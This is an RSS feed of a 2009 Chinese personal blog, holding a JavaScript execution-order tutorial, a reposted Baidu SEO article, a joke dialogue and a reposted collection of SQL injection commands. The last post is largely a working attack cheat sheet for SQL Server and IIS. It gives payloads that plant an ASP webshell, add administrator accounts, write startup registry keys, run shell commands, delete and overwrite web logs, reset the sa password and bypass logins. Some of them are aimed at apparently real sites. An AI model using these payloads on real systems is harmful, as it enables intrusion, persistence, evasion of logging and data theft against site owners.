<![CDATA[SJ]]> http://370567136.qzone.qq.com Sat, 28 Nov 2009 15:44:26 GMT Qzone zh-cn Copyright (C), 2005-2008, Tencent Tech. Co., Ltd. Fri, 27 Nov 2009 10:23:53 GMT <![CDATA[JavaScript执行顺序的问题]]> http://370567136.qzone.qq.com/blog/1259317433
好记星不如烂笔头,适时的总结梳理知识让人更轻松愉快。今天总结下学习和开发中遇到的JavaScript执行顺序的问题,今天挖个坑,以后会慢慢填,也希望抛砖引玉,能学到更多的东西。
顺序可能比较乱,写多了再整理,有些术语可能运用也不恰当,欢迎批评指正。以下使用的示例程序都经过了本人的实际验证,兼容各大浏览器。OK,步入正题。
1. 变量的声明和引用变量必须先声明后引用,这个大家是都知道的,但还是要说说,因为后面要说到一个相关的问题。
alert(myStr); // 弹出"undefined";
var myStr = "Hello World!";
alert(myStr); // 弹出"Hello World";2. 函数的声明和调用
JavaScript是一种描述型脚本语言,由浏览器进行动态的解析与执行。函数的定义方式大体有以下两种,浏览器对于不同的方式有不同的解析顺序。
//“定义式”函数定义
function Fn1(){
alert("Hello World!");
}
//“赋值式”函数定义
var Fn2 = function(){
alert("Hello wild!");
}页面加载过程中,浏览器会对页面上或载入的每个js代码块(或文件)进行扫描,如果遇到定义式函数,则进行预处理(类似于C等的编译),处理完成之后再开始由上至下执行;遇到赋值式函数,则只是将函数赋给一个变量,不进行预处理(类似1中变量必须先定义后引用的原则),待调用到的时候才进行处理。下面举个简单的例子:
//“定义式”函数定义
Fn1();
function Fn1(){
alert("Hello World!");
}正常执行,弹出“Hello World!”,浏览器对Fn1进行了预处理,再从Fn1();开始执行。
//“赋值式”函数定义
Fn2();
var Fn2 = function(){
alert("Hello wild!");
}Firebug报错:Fn2 is not a function,浏览器未对Fn2进行预处理,依序执行,所以报错Fn2未定义。
3. 代码块及js文件的处理“代码块”是指一对<script type=”text/javascript”></script>标签包裹着的js代码,文件就是指文件啦,废话:D
浏览器对每个块或文件进行独立的扫描,然后对全局的代码进行顺序执行(2中讲到了)。所以,在一个块(文件)中,函数可以在调用之后进行“定义式”定义;但在两个块中,定义函数所在的块必须在函数被调用的块之前。
很绕口,看例子好了:
<script type="text/javascript">
Fn();
</script>
<script type="text/javascript">
function Fn(){
alert("Hello World!");
}
</script>
// 报错:Fn is notdefined,两个块换过来就对了4. 重复定义函数会覆盖前面的定义这和变量的重复定义是一样的,代码:
function fn(){
alert(1);
}
function fn(){
alert(2);
}
fn();
// 弹出:“2”如果是这样呢:
fn();
function fn(){
alert(1);
}
function fn(){
alert(2);
}
// 还是弹出:“2”还是弹出“2”,为什么?2都讲了好吧…
5. body的onload函数与body内部函数的执行body内部的函数会先于onload的函数执行,测试代码:
//html head...
<script type="text/javascript">
function fnOnLoad(){
alert("I am outside the Wall!");
}
</script>
<body onload="fnOnLoad();">
<script type="text/javascript">
alert("I am inside the Wall..");
</script>
</body>
//先弹出“I am inside the Wall..”;
//后弹出“I am outside the Wall!”body的onload事件触发条件是body内容加载完成,而body中的js代码会在这一事件触发之前运行(为什么呢?6告诉你..)
6. JavaScript是多线程or单线程?严格来说,JavaScript是没有多线程概念的,所有的程序都是“单线程”依次执行的。
举个不太恰当的例子:
function fn1(){
var sum = 0;
for(var ind=0; ind<1000; ind++) {
sum += ind;
}
alert("答案是"+sum);
}
function fn2(){
alert("早知道了,我就是不说");
}
fn1();
fn2();
//先弹出:“答案是499500”,
//后弹出:“早知道了,我就是不说”那你肯定要问:那延时执行、Ajax异步加载,不是多线程的吗?没错,下面这样的程序确实看起来像“多线程”:
function fn1(){
setTimeout(function(){
alert("我先调用")
},1000);
}
function fn2(){
alert("我后调用");
}
fn1();
fn2();
// 先弹出:“我后调用”,
// 1秒后弹出:“我先调用”看上去,fn2()和延时程序是分两个过程再走,但其实,这是JavaScript中的“回调”机制在起作用,类似于操作系统中的“中断和响应” —— 延时程序设置一个“中断”,然后执行fn2(),待1000毫秒时间到后,再回调执行fn1()。
同样,5中body的onload事件调用的函数,也是利用了回调机制——body加载完成之后,回调执行fnOnLoad()函数。
Ajax请求中的数据处理函数也是一样的道理。
关于JavaScript线程问题的更深入讨论,看这篇javascript中的线程之我见,以及infoQ上的JavaScript多线程编程简介
困了,再说一下回调函数吧。
7. 回调函数回调函数是干嘛用的?就是回调执行的函数嘛,又废话:D
如6所说,最常见的回调就是onclick、onmouseover、onmousedown、onload等等浏览器事件的调用函数;还有Ajax异步请求数据的处理函数;setTimeOut延时执行、setInterval循环执行的函数等。
干脆我们写一个纯粹的回调函数玩:
function onBack(num){
alert("姗姗我来迟了");
// 执行num个耳光
}
function dating(hours, callBack){
var SP= 0; // SP,愤怒值
//女猪脚在雪里站了hours个钟头
//循环开始..
SP ++;
//循环结束...
callBack(SP);
}
dating(1, onBack);dating运行完之后再执行回调函数onBack —— 约会结束了,暴风骤雨开始了。
今天先写到这里,一些更深入的东西还有待整理,更多的东西还需要继续学习,欢迎批改补充,欢迎指点迷津。

转自:cssrain
------------------
关注互联网~ 关注前端技术~





]]> http://370567136.qzone.qq.com/blog/1259317433#comment 143654913 Fri, 27 Nov 2009 10:23:53 GMT http://370567136.qzone.qq.com/blog/1259317433 <![CDATA[转载:百度如何优化-转]]> http://370567136.qzone.qq.com/blog/1259317176 虽然已经很久没写过关于SEO的文章了,但经常还是有许多朋友在QQ留言或什么的问关于百度优化方面的问题。今晚在www.semyj.com看到一篇关于百度优化的文章,觉得很不错,于是转了过来跟大家分享。(注:本文非丘仕达原创)

已经有很多网友问我百度如何优化了,不过我一直不清楚如何来写更合适。有好几个原因。首先是,很多知识,我不先介绍一下的话,到时候我写出来大家不容易理解。就如我博客刚开的时候,我就想写《SEO案例:锚文本、关键字、nofollow、Web标准化》这篇文章,但是如果一开始不讲一下为什么要重视锚文本、如何选关键字、nofollow的作用、为什么要标准化的话,很多人可能会觉得我只是讲了一个特别注意细节的案例。

所以我会先把google的优势讲明白,把搜索引擎是怎么运作的讲明白,然后才能把如何做百度优化讲明白。我博客里的很多文章都是从google的角度出发来讲SEO的,但是你都可以思考一下同样的事情要是百度来处理的话,会如何去解决。

第二个原因就是百度优化和google优化在技术上有80%是相似的,所以不用特别的区分是百度优化还是google优化。而且,做一个网站的SEO工作,那些流程和方法都是一样的。说起相似性,你就可以看到:一个在google上排名很强势的网站,在百度上也会有不错的排名。还有,百度前几年不是一直宣称google侵犯了百度在超链分析法上的专利吗,虽然很荒谬,但是可以看出百度也是注重外部链接的。而且现在还有一个趋势就是,百度在算法上越来越模仿google。

另一个原因就是其他方面的。互联网的圈子其实很小,百度排名确实有一些技巧,但是我今天在这里说明的技巧,明天大家就不能用了。

总体来说,百度的优化要比google英文的优化容易得多。现在我主要从事的英文优化,同时也在做部分百度优化的工作。在百度上,基本上现在只要特别注意去优化的词语,不是非常热门的话,非推广的搜索结果都排在第一了。(但是对于一个大型网站的话,这样特别注意优化热门词语,会让你丢失掉原本属于你的50%以上的流量。)而我用的一些技巧,都是在英文SEO领域用滥了的技巧。

如果能把英文的SEO做透的话,做百度的优化感觉很容易。很早以前,在一些SEOer眼里,百度优化,非推广的搜索结果排在第一不是难事,要保持第一就很伤脑筋了。

接下来谈一下影响你做好百度优化的几个因素。

1,百度的搜索技术很糟糕。
不管是在爬虫,还是索引,还是排序算法上都有很多缺陷。比如搜索一个词语,同一个网站占据前几十个搜索结果,就是一个很低级的错误。而很多大型网站,也应该被百度的爬虫把服务器“攻击”得不行了吧。反作弊措施也很初级,所以一大批作弊的网站照样可以活的很好,对于一贯不作弊来做SEO的人来说,这点无可奈何。这都是技术上的,还有的就是人为的。比如很多百度认为“影响业务”的网站,无论从抓取率还是排序上都是被分配了特殊的权重的,导致这些网站的SEO流量怎么也做不起来。这样被区别对待的网站有很多,国内好几家著名网站包括阿里巴巴中文站都是这样,所以阿里巴巴中文站的SEO流量中,google来的流量反而比百度高很多。 而百度自己的业务,却被赋予越来越高的权重,甚至自己网站上很多明显的垃圾页面,照样有好的排名。如:
百度搜索结果
尽管我是不主张SEO上作弊的,但是如果是小网站在百度上作SEO,在注意百度的一些反作弊措施下,就适当用一些方法吧。

2,服务器效率低
google Caffeine(咖啡因) 更新了什么》揭示了数据中心的效率是搜索引擎的命脉。而百度的数据中心无疑是没什么亮点的。经常性的当机和数据丢失,使国内的很多做SEO的人以为是自己的网站有了作弊问题而从搜索引擎消失了。一个大型的服务器集群,管理起来特别考验一家公司的技术实力。管理数据中心很像“打地鼠”的游戏,这边几个当掉的服务器刚刚解决,那边又有服务器当机了。google在这方面也遇到过很多问题,得益于他们的技术能力,现在都得到了不错的解决。虽然也有数据丢失,但是平均每份数据都有2份备用,所以在百度上出现的那种突然大量收录消失了的状况,在google上是很难见到的。
我经常看到很多人对于网站在百度上的收录量患得患失,其实很多时候,都不是因为百度处罚你。而是他们自己出了问题。

3,反作弊措施
无论百度还是google,SEO要做得好都要从这个搜索引擎的角度来看待你做的SEO优化工作。在百度上作SEO,心里要时刻想着它有可能会用什么样的反作弊措施来检查你的网站。这个是在百度上做好SEO的秘籍。
举一个我操作过的案例:
以前给一个国内比较有名的网站做SEO,因为比较遵守这条规则,把总的SEO流量从6万做到267万。(之所以流量翻了40多倍,还有一部分原因是他们以前喜欢用ajax技术,妨碍了收录。)后来流量一下子又降到了30万左右,因为那个公司有特殊的渠道,得到了百度内部的意见说网站优化过度,我当时特别纳闷怎么就优化过度了。后来就想,如果我是百度的话,我会如何判断一个网站优化过度呢?从国内那时的SEO现状来看,我会这么判断:因为每个做SEO的人,基本上都会去改title, keywords, description。那我首先设置一个过滤条件,就是把那种每个网页上title, keywords, description都写了大量内容的网站特别对待,因为这些网站有了SEO的企图,所以也会在外部链接等等其他因素上作很多优化的动作的。这种被列入嫌疑的网站,只要流量有异常的大量增长,就开始严格清理。那个网站,在其他方面都无异常,甚至没有在title, keywords, description重复一次关键词,唯独每个网页, keywords, description都是写了很丰富的内容的,当时为了写这些内容还花费了大量的时间,因为每个网页都要写得不一样。
想清楚了这个,我就把那种能不写 keywords, description 的就不写。甚至做了一个很大胆的决定,就是所有的网页都不写keywords。因为我如果是百度的话,我绝对不会考虑把keywords作为影响排名的因素的。description之所以不抛弃,是因为在搜索结果里,人还是需要阅读到的。这样改动后一个月,流量就恢复了,直到我离开那家公司前,SEO流量都还稳定在200万以上。
因为这篇文章实在是罗嗦了,以后再讲一些其他案例。不久前Matt Cutts在博客里也说google不把keywords作为排名的因素。如果你在第一线实践的话,这些东西早就知道了。我以前就想把这个写出来,没想到Matt Cutts抢先说了。

4,人工干预
百度是一个很仇视SEO的搜索引擎,在他们眼里,SEO妨碍了他们的收益。这与我在《怎么样去学SEO》一文中提到的google与网站共赢的策略完全相反。google也有人工审核,但是是奔着处理作弊网站而来的,而且尺度还很宽松的。百度的人工干预会让你在做一些热门词语的时候非常麻烦,这点就不多说,大家都经历过。
这4个影响你在百度上作SEO的因素都是客观的。还有一个因素就是竞价排名,但是这个在慢慢消退。
不过还是可以在百度上把SEO做得很好的,那就是整体把握一个网站的策略,方法。SEO应该做的是给网站带来利益,要在各种条件和资源的限制下,把网站的利益最大化。这是才是一个SEOer应该追求的目标,而不是今天有多少收录,哪个热门词没有排上去等等。我还是慢慢一个个的讲吧。
------------------------------------------
本文转载自:丘仕达: 百度如何优化-转
用QQ邮箱阅读空间订阅丘仕达
什么是阅读空间?
]]> http://370567136.qzone.qq.com/blog/1259317176#comment 135266305 Fri, 27 Nov 2009 10:19:36 GMT http://370567136.qzone.qq.com/blog/1259317176 <![CDATA[一个思维严密的学生]]> http://370567136.qzone.qq.com/blog/1254918659 他反问“是无声手枪或别的无声的枪吗?”
“不是。”
“枪声有多大?”
“80-100分贝。”
“那就是说会震的耳朵疼?”
“是。”
“在这个城市里打鸟犯不犯法?”
“不犯。”
“您确定那只鸟真的被打死啦?”
“确定。”老师已经不耐烦了“拜托,你告诉我还剩几只就行了,OK”
“OK,树上的鸟里有没有聋子?”
“没有。”
“有没有关在笼子里的?”
“没有。”
“边上还有没有其他的树,树上还有没有其他鸟?”
“没有。”
“有没有残疾的或饿的飞不动的鸟?”
“没有。”
“算不算怀孕肚子里的小鸟?”
“不算。”
“打鸟的人眼有没有花?保证是十只?”
“没有花,就十只。” 老师已经满脑门是汗,且下课铃响,但他继续问,
“有没有傻的不怕死的?”
“都怕死。”
“会不会一枪打死两只?”
“不会。”
“所有的鸟都可以自由活动吗?”
“完全可以。”
“如果您的回答没有骗人,”学生满怀信心的说,“打死的鸟要是挂在树上没掉下来,那么就剩一只,如果掉下来,就一只不剩。”
老师晕倒 …… ]]> http://370567136.qzone.qq.com/blog/1254918659#comment 134218240 Wed, 07 Oct 2009 12:30:59 GMT http://370567136.qzone.qq.com/blog/1254918659 <![CDATA[最详细的SQL注入相关的命令整理 (转)]]> http://370567136.qzone.qq.com/blog/1251569128 记得最初学网站注入还是在2006年的时候,那时候拿着明小子天天注入别人的网站,其实那时候连sql都不会,就看别人的教程,按步骤操作,现在想,真是天真了………………

今天偶然发现很多网站还是存在注入漏洞,包括有些比较知名的网站,看来网络安全还没有抓到底呀。

下面是我在网上找的一些SQL注入命令,希望开发者们在开发的时候要注意数据安全呀,多一份心,不要在亡羊补牢啦。。。。。

1、 用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- ? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2、 显示SQL系统版本:
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
? http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp,行17
3、 在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,例如“select * from mytable where id in(1)”,括号中的值就是我们提交的数据,它的结果与使用“select * from mytable where id=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“) and 1=1 and 1 in(1”后原来的SQL语句就变成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似“select * from mytable where name in('firstsee')”的查询语句造成的。4、 判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--5、 向启动组中写入命令行和执行程序:
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
6、 查看当前的数据库名称:
? http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n改成0,1,2,3……就可以跨库了
? http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp,行17
7、 列出当前所有的数据库名称:
select * from master.dbo.sysdatabases 列出所有列的记录
select name from master.dbo.sysdatabases 仅列出name列的记录8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
ENDdrop TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END以下是一行里面将WEB用户加到管理员组中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END以下是一行中执行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE ENDSQL下三种执行CMD命令的方法:
先删除7.18号日志:
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)首先开启jet沙盘模式,通过扩展存储过程xp_regwrite修改注册表实现,管理员修改注册表不能预防的原因。出于安全原因,默认沙盘模式未开启,这就是为什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER权限,为了方便,这里建议使用sysadmin权限测试:
? exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
注:
0 禁止一切(默认)
1 使能访问ACCESS,但是禁止其它
2 禁止访问ACCESS,但是使能其他
3 使能一切? 这里仅给出sysadmin权限下使用的命令:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
? 建立链接数据库'L0op8ack'参考命令:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'? 如何使用链接数据库:
使用这个方式可以执行,但是很不幸,DB_OWNER权限是不够的,需要至少sysadmin权限或者securityadmin+setupadmin权限组合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
最终发现,还是sa权限或者setupadmin+securityadmin权限帐户才能使用,
一般没有哪个管理员这么设置普通帐户权限的实用性不强,仅作为一个学习总结吧
大致过程如下,如果不是sysadmin,那么IAS.mdb权限验证会出错,
我测试的时候授予hacker这个用户setupadmin+securityadmin权限,使用ias.mdb失败
需要找一个一般用户可访问的mdb才可以:? 新建链接服务器”L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
? exec sp_addlinkedsrvlogin 'L0op8ack','false';--或
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
? select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
? exec sp_droplinkedsrvlogin 'L0op8ack','false';--
? exec sp_dropserver 'L0op8ack';--再考贝一个其它文件来代替7.18日文件:
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
9、 用update来更新表中的数据:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www用户密码的16位MD5值为:a0b923820dcc509a,即把密码改成1;
32位MD5值为: ,密码为10、 利用表内容导成文件功能
SQL有BCP命令,它可以把表的内容导成文本文件并放到指定位置。利用这项功能,我们可以先建一张临时表,然后在表中一行一行地输入一个ASP木马,然后用BCP命令导出形成ASP文件。
命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,最终上传了一个runcommand.asp的木马)。11、创建表、播入数据和读取数据的方法
? 创建表:
' and 1=1 un&#105;on select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
? 往表里播入数据:
' and 1=1 un&#105;on select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 un&#105;on select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
? 从表里读取数据:
' and 1=(select count(*) from cyfd where gyfd >1)--? 删除临时表:
';drop table cyfd;--12、通过SQL语句直接更改sa的密码:
? update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,这样sa的密码就被我们改成了111111拉。呵呵,解决的方法就是把sa给删拉。,怎么删可以参考我的《完全删除sa这个后门》。? 查看本机所有的数据库用户名:
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins? 更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'13、查询dvbbs库中所有的表名和表结构:
? select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
? select * from dvbbs.dbo.syscolumns where id=142610412114、手工备份当前数据库:
完全备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to [email=disk=@s]disk=@s[/email] WITH formAT--
差异备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to [email=disk=@s]disk=@s[/email] WITH DIFFERENTIAL,formAT—15、添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmincmd.exe /c isql -E /U alma /P /i K:\test.qry
16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有的用户建立的表名。
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>017、
? http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns (where id=1234)
列出rdweb库中所有表中的字段名称
? select * from dvbbs.dbo.syscolumns where id=5575058
列出库dvbbs中表id=5575058的所有字段名18、删除记录命令:delete from Dv_topic where boardid=5 and topicid=7978
19、绕过登录验证进入后台的方法整理:
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6)or 1=1--
7) or 'a='a
8)" or "a"="a
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
12) 'or''='
13) 人气%' and 1=1 and '%'='20、寻找网站路径的方法汇总:
1)查看WEB网站安装目录命令:
? cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt (将2换成1、3、4、5试试)
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果,所以不用导出到文件2)在网站上随便找到一个图片的名字 123.jpg
然后写进批处理程序123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt执行后 type c:\123.txt
这样来分析网站的路径3)SQL服务器和网站服务器在同一个服务器上,好了是可以执行命令是吧?
将执行命令输出结果到
%windir%\help\iishelp\common\404b.htm或者500.asp
注意输出前Backup这两个文件
如:
dir c:\ >%windir%\help\iishelp\common\404b.htm
然后随便输入一个文件来访问:http://目标ip/2.asp 4)针对win2000系统:xp_regread读取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 获取WEB路径
2003系统:xp_regread读取,未找到方法
如:
(1) 新建一个表cyfd(字段为gyfd):http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2) 把web路径写进去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
(3) 还是让他不匹配,显示错误:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 'Y:\Web\烟台人才热线后台管理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read() 哈哈哈。。路径暴露了。。
(4)接下来删除表:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--5)用regedit命令导出注册表,将导出的结果保存的路径到%windir%\help\iishelp\common\404b.htm或者500.asp页面
regedit命令说明:
